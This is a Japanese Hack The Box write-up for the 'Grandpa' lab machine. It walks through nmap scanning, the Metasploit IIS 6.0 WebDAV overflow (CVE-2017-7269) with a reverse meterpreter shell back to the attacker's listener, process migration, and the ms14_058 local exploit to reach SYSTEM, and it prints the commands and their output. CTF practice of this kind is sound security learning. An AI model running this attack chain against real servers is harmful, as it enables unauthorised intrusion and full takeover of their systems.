はじめに
どうも。平井堅のPOPSTAR歌ってちょっと過呼吸になったいっきゅうです。
間違っているところとかあればご指摘お願いします。
twitter:ikkyu(@ikk_hck)
Grandpa
HackTheBox公式より
SYNOPSISGrandpa is one of the simpler machines on Hack The Box, however it covers the widely-exploitedCVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousandsof IIS servers around the globe when it became public knowledge.
nmap
nmap -sC -sV --script vuln -oA nmap 10.10.10.14
# Nmap 7.80SVN scan initiated Sun Oct 25 19:01:50 2020 as: nmap -sC -sV --script vuln -oA nmap 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.27s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /postinfo.html: Frontpage file or folder
| /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
| /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
| /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
| /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
| /_vti_bin/shtml.dll: Frontpage file or folder
|_ /_vti_bin/shtml.exe: Frontpage file or folder
| http-frontpage-login:
| VULNERABLE:
| Frontpage extension anonymous login
| State: VULNERABLE
| Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
| References:
|_ http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-server-header: Microsoft-IIS/6.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:microsoft:internet_information_server:6.0:
| CVE-2017-7269 10.0 https://vulners.com/cve/CVE-2017-7269
| CVE-2008-0075 10.0 https://vulners.com/cve/CVE-2008-0075
| CVE-2001-0500 10.0 https://vulners.com/cve/CVE-2001-0500
| CVE-2009-3023 9.3 https://vulners.com/cve/CVE-2009-3023
| CVE-2008-1446 9.0 https://vulners.com/cve/CVE-2008-1446
| CVE-2010-1256 8.5 https://vulners.com/cve/CVE-2010-1256
| CVE-2009-1535 7.6 https://vulners.com/cve/CVE-2009-1535
| CVE-2007-2897 7.5 https://vulners.com/cve/CVE-2007-2897
| CVE-2008-0074 7.2 https://vulners.com/cve/CVE-2008-0074
| CVE-2006-0026 6.5 https://vulners.com/cve/CVE-2006-0026
| CVE-2009-4444 6.0 https://vulners.com/cve/CVE-2009-4444
| CVE-2005-2678 5.0 https://vulners.com/cve/CVE-2005-2678
| CVE-2003-0718 5.0 https://vulners.com/cve/CVE-2003-0718
| CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
| CVE-2005-2089 4.3 https://vulners.com/cve/CVE-2005-2089
| CVE-2009-2521 2.6 https://vulners.com/cve/CVE-2009-2521
|_ CVE-2003-1582 2.6 https://vulners.com/cve/CVE-2003-1582
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 25 19:16:21 2020 -- 1 IP address (1 host up) scanned in 871.25 seconds
結果から対象のマシンがMicrosoft IIS httpd 6.0であること、そして脆弱性があることがわかります。
メタスプロイトで検索
$ searchsploit IIS 6.0
/.searchsploit_rc" for "files_shellcodes.csv" (package_array: exploitdb)
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
-------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Exploit
みつかったのでメタスプロイトのコンソールを起動。
$ msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
=[ metasploit v6.0.10-dev-7be36a772d ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: View all productivity tips with the tips command
再び検索して、2個めのを使います。
msf6 > search IIS 6.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
1 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
2 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 > use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
必要な設定を確認
msf6 exploit(windows/firewall/blackice_pam_icq) > show options
Module options (exploit/windows/firewall/blackice_pam_icq):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1 yes The target port (UDP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Bruteforce
リモートホストとローカルホストのIPアドレスを設定して実行
msf6 exploit(windows/firewall/blackice_pam_icq) > set rhost 10.10.10.14
rhost => 10.10.10.14
msf6 exploit(windows/firewall/blackice_pam_icq) > set lhost 10.10.14.6
lhost => 10.10.14.6
msf6 exploit(windows/firewall/blackice_pam_icq) > run
[*] Started reverse TCP handler on 172.20.10.7:4444
[*] Trying target iis-pam1.dll 3.6.06 [5e0a47ef]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target iis-pam1.dll 3.6.11 [5e0da1db]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP3/SP4/SP5 [777e79ab]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP4/SP5 [7733b8db]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP5/SP6 - advapi32 [77dcd1cb]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP3/SP5/SP6 - shell32 [77cec080]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinNT SP5/SP6 - mswsock [7767ebca]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - shell32 [776606af]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - atl [76b305a7]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - atl [76e61a21]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - ws2_32 [71ab7bfb]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0/SP1 - mswsock [71a5403d]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Windows 2000 Pro SP4 English [7c2ec68b]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Win2000 SP0 - SP4 [750231e2]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Win2000 SP2/SP3 - samlib [75159da3]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Win2000 SP0/SP1 - activeds [77ed0beb]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Windows XP Pro SP0 English [77e3171b]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Windows XP Pro SP1 English [77dc5527]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target WinXP SP0 - SP1 [71aa3a4b]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Trying target Win2003 SP0 [71bf3cc9]...
[*] Sending UDP request to 62605 (599 bytes)
[*] Sleeping (giving exception handler time to recover)
[*] Exploit completed, but no session was created.
何度か試してもうまくいかなかったので3つめのを使うことにします。
msf6 exploit(windows/firewall/blackice_pam_icq) > search IIS 6.0
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 2010-09-14 normal No Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service
1 exploit/windows/firewall/blackice_pam_icq 2004-03-18 great No ISS PAM.dll ICQ Parser Buffer Overflow
2 exploit/windows/iis/iis_webdav_scstoragepathfromurl 2017-03-26 manual Yes Microsoft IIS WebDav ScStoragePathFromUrl Overflow
Interact with a module by name or index. For example info 2, use 2 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/firewall/blackice_pam_icq) > use 2
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
Name Current Setting Required Description
---- --------------- -------- -----------
MAXPATHLENGTH 60 yes End of physical path brute force
MINPATHLENGTH 3 yes Start of physical path brute force
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Path of IIS 6 web application
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2 SP2 x86
先ほどと同様に設定をして実行
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.14
rhost => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.6
lhost => 10.10.14.6
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.6:4444 -> 10.10.10.14:1030) at 2020-10-26 20:09:37 +0900
meterpreter >
成功すね
meterpreter > getuid
[-] 1055: Operation failed: Access is denied.
PE
でも権限がたりないっぽい、、
msf戻って、対象マシンとのセッションをlocal_exploit_suggesterに設定して実行
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
いろいろでてきますがexploit/windows/local/ms14_058_track_popup_menuを使うことにします。他のは試してないです。
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_058_track_popup_menu
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
設定を確認して実行
msf6 exploit(windows/local/ms14_058_track_popup_menu) > show options
Module options (exploit/windows/local/ms14_058_track_popup_menu):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.20.10.7 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
session => 1
msf6 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.6
lhost => 10.10.14.6
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[-] Exploit failed: Rex::Post::Meterpreter::RequestError 1054: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
失敗したみたいです。他のライトアップなどを参考にすると、プロセスを変えるとうまくいくそうです。原因は後述します。
まずマシン側にもどってから、psでプロセスを確認
msf6 exploit(windows/local/ms14_058_track_popup_menu) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
616 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
764 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1076 396 cisvc.exe
1116 396 svchost.exe
1176 396 inetinfo.exe
1216 396 svchost.exe
1328 396 VGAuthService.exe
1408 396 vmtoolsd.exe
1456 396 svchost.exe
1596 396 svchost.exe
1700 396 alg.exe
1812 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1912 396 dllhost.exe
2308 616 wmiprvse.exe
2812 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2884 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2936 2812 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
1812, 2812, 2884がNT AUTHORITY\NETWORK SERVICEでうごいているので、1812プロセスを移行します。そして権限を確認。
meterpreter > migrate 1812
[*] Migrating from 2936 to 1812...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
ユーザーネームがNT AUTHORITY\NETWORK SERVICEとなっています。さっきより権限が上がっています。ルートディレクトリに移ってシェルを起動しディレクトリを見てみます。
meterpreter > cd /
meterpreter > shell
Process 2744 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\
04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 04:32 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:18 PM <DIR> Program Files
12/24/2017 07:27 PM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 18,091,909,120 bytes free
いろいろ見ていくとDocuments and Settings配下にAdministratorを発見しますがアクセス権がないようです。
C:\>cd "Documents and Settings"
cd "Documents and Settings"
C:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:12 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 04:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 18,091,880,448 bytes free
C:\Documents and Settings>cd Administrator
cd Administrator
Access is denied.
したがって移行するプロセスを2812に変更して実行。
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
408 348 lsass.exe
616 396 svchost.exe
680 396 svchost.exe
736 396 svchost.exe
764 396 svchost.exe
800 396 svchost.exe
936 396 spoolsv.exe
964 396 msdtc.exe
1076 396 cisvc.exe
1116 396 svchost.exe
1176 396 inetinfo.exe
1216 396 svchost.exe
1316 1076 cidaemon.exe
1328 396 VGAuthService.exe
1408 396 vmtoolsd.exe
1456 396 svchost.exe
1596 396 svchost.exe
1700 396 alg.exe
1812 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
1912 396 dllhost.exe
2060 1076 cidaemon.exe
2116 348 logon.scr
2164 1076 cidaemon.exe
2308 616 wmiprvse.exe
2812 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2884 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
meterpreter > migrate 2812
[*] Migrating from 1812 to 2812...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/local/ms14_058_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.14.6:4444
[*] Launching notepad to host the exploit...
[+] Process 2044 launched.
[*] Reflectively injecting the exploit DLL into 2044...
[*] Injecting exploit into 2044...
[*] Exploit injected. Injecting payload into 2044...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.6:4444 -> 10.10.10.14:1033) at 2020-10-26 20:37:32 +0900
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
ユーザーネームがNT AUTHORITY\SYSTEMにかわっていることが分かります。先程のディレクトリにもアクセスできるようです。
meterpreter > shell
Process 3008 created.
Channel 1 created.
diMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of c:\
04/12/2017 04:27 PM <DIR> ADFS
04/12/2017 04:04 PM 0 AUTOEXEC.BAT
04/12/2017 04:04 PM 0 CONFIG.SYS
04/12/2017 04:32 PM <DIR> Documents and Settings
04/12/2017 04:17 PM <DIR> FPSE_search
04/12/2017 04:17 PM <DIR> Inetpub
12/24/2017 07:18 PM <DIR> Program Files
12/24/2017 07:27 PM <DIR> WINDOWS
04/12/2017 04:05 PM <DIR> wmpub
2 File(s) 0 bytes
7 Dir(s) 18,091,823,104 bytes free
c:\>cd "Documents and Settings"
cd "Documents and Settings"
c:\Documents and Settings>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of c:\Documents and Settings
04/12/2017 04:32 PM <DIR> .
04/12/2017 04:32 PM <DIR> ..
04/12/2017 04:12 PM <DIR> Administrator
04/12/2017 04:03 PM <DIR> All Users
04/12/2017 04:32 PM <DIR> Harry
0 File(s) 0 bytes
5 Dir(s) 18,091,823,104 bytes free
c:\Documents and Settings>cd Administrator
cd Administrator
c:\Documents and Settings\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of c:\Documents and Settings\Administrator
04/12/2017 04:12 PM <DIR> .
04/12/2017 04:12 PM <DIR> ..
04/12/2017 04:28 PM <DIR> Desktop
04/12/2017 04:12 PM <DIR> Favorites
04/12/2017 04:12 PM <DIR> My Documents
04/12/2017 03:42 PM <DIR> Start Menu
04/12/2017 03:44 PM 0 Sti_Trace.log
1 File(s) 0 bytes
6 Dir(s) 18,091,819,008 bytes free
c:\Documents and Settings\Administrator>cd Desktop
cd Desktop
c:\Documents and Settings\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of c:\Documents and Settings\Administrator\Desktop
04/12/2017 04:28 PM <DIR> .
04/12/2017 04:28 PM <DIR> ..
04/12/2017 04:29 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 18,091,819,008 bytes free
Administrator配下のDesktopにroot.txtを発見。おつかれさまでした。
どうしてプロセスを変更するとPEが成功したのか?
原因としてはエクスプロイトコードの検証環境と、今回のターゲットマシンの環境のずれが考えられるそうです。例えばOSが変わってくるとメモリ量が変わってきたりする。
今回はたまたまターゲットサーバの中で、ユーザが「NT AUTHORITY\NETWORK SERVICE」で動いているプロセスが3つしかないので、うまくいくまですべて試せたと。。
では。